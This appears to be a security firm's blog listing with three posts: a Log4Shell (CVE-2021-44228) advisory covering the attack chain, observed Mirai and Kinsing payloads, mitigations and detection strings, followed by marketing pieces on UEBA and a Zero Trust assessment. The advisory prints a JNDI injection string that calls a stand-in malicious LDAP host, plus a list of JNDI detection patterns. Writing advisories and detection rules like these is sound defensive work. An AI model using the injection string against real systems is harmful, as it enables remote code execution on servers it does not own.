News

A vulnerability in Apache Log4j, a widely used logging package for Java has been found. The vulnerability, which can allow an attacker to execute arbitrary code by sending crafted log messages, has been identified as CVE-2021-44228 and given the name Log4Shell. It was first reported privately to Apache on November 24 and was patched with version 2.15.0 of Log4j on December 9. It affects Apache Struts, Apache Solr, Apache Druid, Elasticsearch, Apache Dubbo, and VMware vCenter.


For more information:

https://logging.apache.org/log4j/2.x/security.html


Whenever ${some_expression} can be found, Java lookup mechanisms find the value of expression and replaces it. Some of the lookups supported by Log4j are jndi, sys, env, java, lower, and upper. JNDI lookup supports protocols such as LDAP, RMI, DNS, and IIOP. As we discuss in the following, an attacker could inject JNDI expressions in logs.


For example, an attacker can do this via HTTP requests to a web server; notably, this is the most common attack vector that we have seen currently. The lookup method will then download and execute malicious.class placed in an attacker-controlled LDAP server. In its most basic form, all the attacker has to do is to plant the following expression in the logs


${jndi:ldap://{malicious website}/a}


Attacks observed


Currently, the observed threat actors are dropping Mirai variants and Kinsing coinminers onto vulnerable servers. While some of the network traffic is simple, other threat actors are using obfuscation in the expression to hide their traffic. Examples of these can be found at the end of this entry.

Infection chain


Here is a possible infection flow from attacks that might exploit Log4Shell:


Initial access in relation to MITRE ATT&CK® Tactics


This vulnerability is caused by the “lookup” mechanism in log4j 2.x. When calling the log method in the application, log4j 2.x will call the format method to check the specific characters ${ in each log. If these characters are present, the “lookup” function will be called to find strings after ${ and the said strings replaced with the real value found before. It has been observed that there are different forms of lookups, such as Java Naming Directory Interface (JNDI) lookup, which allow variables to be retrieved by JNDI.


Several JNDI lookup protocols are supported to allow remote lookups like LDAP and RMI. If the log contains the strings ${jndi:logging/context-name}, the method lookup will be called to find the string jndi:logging/context-name.


The attacker might then set a malicious Java class on an attacker-controlled LDAP server. By then, the “lookup” function will be used to execute the malicious class on the remote LDAP server.



Execution in relation to MITRE ATT&CK® Tactics Once the exploit succeeds, depending on the contents of the URL in the lookup, the server then interprets the string. This might then lead to arbitrary shell commands in various forms like Java Class, JavaScript, and Unix shell, among others. Lateral movement in relation to MITRE ATT&CK® Tactics Cobeacon components, which can be used for lateral movement, were also seen to be downloaded. These can also be used for lateral movement and might then lead to a possible ransomware infection, as Cobeacon components have been observed in a variety of ransomware attacks. Credential access in relation to MITRE ATT&CK® Tactics The vulnerability might also lead to the download of malware with credential-stealing capability, such as Kirabash.



Impact Currently, the observed payloads are the Mirai botnet and Kinsing coinminer. The following are two of the possible impacts:

  • Resource hijacking. Coinminers will use up resources to mine cryptocurrency, while Mirai might use the affected systems as part of its botnet for activities such as distributed denial of service (DDoS) or spamming.

  • Network denial of service (DoS). Mirai can make use of the affected system to launch DDoS/DoS attacks as part of its routine.

Patch and Mitigation Though the attacks in the wild are predominantly delivered over HTTP, the vulnerability could be exploited over any protocol wherein user input data is logged using Log4j. Hence, we highly recommend everyone to upgrade to Log4j 2.15.0. Meanwhile, until the vulnerable instances are patched, the vulnerability can be mitigated through the following steps :

  • For >=2.10, set system property log4j2.formatMsgNoLookups to true.

  • For >=2.10, set environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true.

  • For 2.0-beta9 to 2.10.0, remove JndiLookup.class from class path: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class.

One recommended best practice is to limit the egress traffic to internet from necessary ports only. It is important to note that the aforementioned steps are most applicable in cases where Log4j is used directly. Other patches from applications that use Log4j indirectly might also be necessary. As the following list indicates, multiple software vendors have products that expose this vulnerability. Detection guidance Application logs should be monitored for the presence of these patterns or their obfuscated versions:

  • ${jndi:ldap:/}

  • ${jndi:ldaps:/}

  • ${jndi:rmi:/}

  • ${jndi:dns:/}

  • ${jndi:iiop:/}


Conclusion:

The CVE-2021-44228 vulnerability is still being actively investigated in order to properly identify the full scope severity. Given the information currently available, this vulnerability may have a high impact at present and in the future. Most of the applications being affected are widely used in corporate networks as well as home networks. Clients are encouraged to take all necessary steps to ensure they are protected against this vulnerability.


11 views0 comments

Another cyber security breach, a sentence that has become part of our daily lives.

A security breach is any incident that results in unauthorized access to computer data, applications, networks, or devices. It results in information being accessed without authorization.


Typically, it occurs when an intruder can bypass security mechanisms.

Technically, there's a distinction between a security breach and a data breach. A security breach is effectively a break-in, whereas a data breach is defined as the cybercriminal getting away with information. Imagine a burglar; the security breach is when he climbs through the window, and the data breach is when he grabs your pocketbook or laptop and takes it away.


Confidential information has immense value. It's often sold on the dark web; for example, names and credit card numbers can be bought, and then used for the purposes of identity theft or fraud. It's not surprising that security breaches can cost companies huge amounts of money


The sad part of this daily occurrence is the organisations security teams at the frontline of this war is ill equipped to fight the next generation of threats. Organisation’s security teams and leadership must realise that this war has evolved to much more than just the traditional perimeter of your organisation and there SOC response teams on the ground need to be more prepared, better equipped, more agile than any attacker or hacker organization.


This leads me into the title of this article “SOAR the dinosaur in the room. “


Now Gartner classifies SOAR or Security Orchestration, Automation and Response as the following SOAR refers to technologies that enable organizations to collect inputs monitored by the security operations team. For example, alerts from the SIEM system and other security technologies — where incident analysis and triage can be performed by leveraging a combination of human and machine power — help define, prioritize, and drive standardized incident response activities. SOAR tools allow an organization to define incident analysis and response procedures in a digital workflow format.


It’s at this very moment that your security analyst will be asking what’s the problem, this is a critical part of our daily operations? It takes highly skilled Tier 1, Tier 2, and Tier 3 security Analysts to keep the organisations SOAR operations running? I want to see you do better at threat hunting, I want you to find threats faster, I want your response to be more detailed and always give you the Who, What, Where, When?


Before you continue, please hear me out.


Traditional SOAR and SIEM solutions are old, out of date and a in a nutshell give originations false sense of security! The faster an organisations SOC team and Security Leadership realise this the faster organisations can equip themselves to be ready for the new age of cyber security. Resources should not be spending months to analyser millions and even billions of events to tirelessly build correlation rules just to realise that 90% of alerts and events are false positives? SOC teams spend millions on having the latest and greatest SOAR/SIEM solution hoping the playbooks and automations will help them find threats faster and I mean not a year after the breach has taken place. Don’t get me wrong Traditional SIEM and SOAR has a place, but SOC teams need to be realistic and accept that the perimeter has shifted, and the new name of the game is called IDENTITY!


The concept of identity has always been difficult to understand but in a nutshell, Identity can be classified as a user, a customer, a IOT device, a person and anything that’s an entity. I can probably go on a wild run bashing why SOAR/SIEM solutions no longer work… but ultimately how do we better our organisations response and how do we utilise the power of identity to EVOLVE your security?


Behavioural analytics gives you a new lens through which to detect, investigate, and respond to threats that may be hiding in your enterprise—before your data is stolen. Using machine learning, UEBA distils billions of events into a prioritized list of high-quality security leads to focus and accelerate the efforts of your security operations centre (SOC). This intelligence uses big data and machine learning models, combined with a highly intuitive user interface (UI), to accelerate threat detection and investigation from weeks to minutes. It is uniquely positions your SOC to find the threats that matter your organizations valuable data. Ultimately, it helps your SOC team protect, limited security or financial resources, and significant surface area to monitor. Unlike other solutions UEBA works with you SOAR solution to bypasses rules and thresholds and instead assesses the potential risk of a user or entity in your enterprise based on mathematical probability and unsupervised machine learning models. This approach, combined with big-data architecture, allows your security team to detect threats with speed and at scale.


In conclusion UEBA helps your SOC teams

  • Find elusive, unknown threats

  • Contextualized events of the riskiest behaviours

  • Cut through the noise

  • Boost SOC productivity

Security Leaders enable your SOC teams to Respond before the damage is done, UEBA was made by threat hunters to help you EVOLVE YOUR Security.

#UEBA #SIEM #SOAR #IAM

Brendon Meyer

29 views0 comments

As a cyber security professional, the concept of Zero Trust entices us : the right access is provided to the right users at the right time. However journey to achieve the zero trust is not straight forward. We need to answer few questions. Do I need to acquire new tool, or do I need to re-design the current security architecture? Can I achieve the Zero Trust reusing my current security architecture?



We are here to assist you , Our free no-obligation assessment will asses the maturity of your organization is on the path to zero trust. We will provide a zero trust maturity report and recommendations to finish the zero trust journey with limited resources.



Zero Trust


The Zero Trust Security approach ensures the right people have the right level of access, to the right resources, in the right context, and that access is assessed continuously — all without adding friction for the user.


Thus, the initial step in your Zero Trust strategy should be focused on:

  • Granting access by verifying who is requesting access

  • Understanding the context of the request

  • Determining the risk of the access environment

This never trust, always verify, enforce least privilege approach provides the greatest security for organizations. It adapts to the complexity of the modern environment, embraces the mobile workforce and protects people, devices, applications and data wherever they are.


A zero-trust approach doesn’t require a complete reinvention of your infrastructure. The most successful solutions starts with Access. People, Processes, Devices that Access your systems and and the access controls for those entities. This is where Identity comes in , making it the Foundational Technology on your path to Zero Trust Security.

Why Zero Trust Assessment ?


Different organizational requirements, existing technology implementations and security stages all affect how a Zero Trust security model implementation is planned and executed.


The Zero Trust Assessment tool will help you determine where you are in your journey across Zero Trust Maturity Model shown alongside. The assessment will provide where you are , where do you want to go & Gap Analysis with Personalized recommendations on how to progress to the next stage.


Free Online Assessment Based on Industry Framework & Architecture

Assessment covering all major domains E.g Access Management , PAM, Identity Governance , Data Access Governance etc.

Gap Analysis with Personalized Recommendations, which would be virtually presented by team of experts after Analysis – 1 Week after filling in the Online Assessment.

Free Half a Day Zero Trust Workshop for Deep Dive Analysis with relevant stake holders , after the initial Assessment discussion


Click here to take our Zero Trust Assessment Based on NIST Framework & Architecture with no-obligation


Cheers,

Christiaan



8 views0 comments
1
2